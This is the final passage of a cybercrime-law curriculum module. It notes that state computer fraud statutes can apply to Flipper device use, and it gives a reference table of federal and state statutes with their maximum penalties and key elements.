State law minimum sentence awareness: Even when federal CFAA exposure is low, state computer fraud statutes often have no de minimis carve-out. California § 502 carries up to 3 years in state prison. Texas § 33.02 first degree felony carries 5-99 years. New York § 156.27 (computer tampering first degree) carries 4-7 years. A Flipper used in those states against any networked computer system — even briefly — triggers state jurisdiction regardless of the federal CFAA analysis.


Appendix: Relevant Statutes Quick Reference

| Statute | Name | Maximum Penalty | Key Element |
|---|---|---|---|
| 18 U.S.C. § 1030(a)(2) | CFAA — Unauthorized Access to Obtain Information | 5 years (10 years if prior) | Access without authorization + obtain information |
| 18 U.S.C. § 1030(a)(5)(A) | CFAA — Intentional Damage | 10 years (20 years if prior) | Knowing transmission + intentional damage |
| 18 U.S.C. § 1030(a)(5)(C) | CFAA — Unauthorized Access + Damage | 5 years (10 years if prior) | Unauthorized access + resulting damage + loss |
| 18 U.S.C. § 1030(c)(4)(B) | CFAA — Critical Infrastructure Enhancement | 20 years | CFAA violation affecting critical infrastructure |
| 18 U.S.C. § 1029(a)(2) | Access Device Fraud — Use | 10 years (15 years if prior) | Use of unauthorized access device + $1K threshold |
| 18 U.S.C. § 1029(a)(3) | Access Device Fraud — Possession | 10 years (15 years if prior) | Possession of 15+ unauthorized access devices |
| 18 U.S.C. § 1029(a)(4) | Access Device Fraud — Device-Making Equipment | 15 years | Possession of device-making equipment |
| 18 U.S.C. § 1028A | Aggravated Identity Theft | +2 years mandatory consecutive | Use of another's means of identification during enumerated felony |
| 18 U.S.C. § 1343 | Wire Fraud | 20 years (30 years if financial institution) | Wire communication + scheme to defraud |
| 47 U.S.C. § 333 | FCC — Malicious Interference | $100K/day + 1 year imprisonment | Interference with licensed radio station; strict liability |
| Cal. Penal Code § 502 | California Computer Fraud | Up to 3 years state prison | Unauthorized computer access/disruption |
| Tex. Penal Code § 33.02 | Texas Computer Fraud | Up to life (1st degree felony if serious bodily injury) | Intentional access without effective consent |

This module is part of the LawZeee Phase 1 Cybercrime Law curriculum. Prior module: 01s — Emerging: AI/LLM CFAA, Supply Chain Liability. This is the final module in the Phase 1 series.
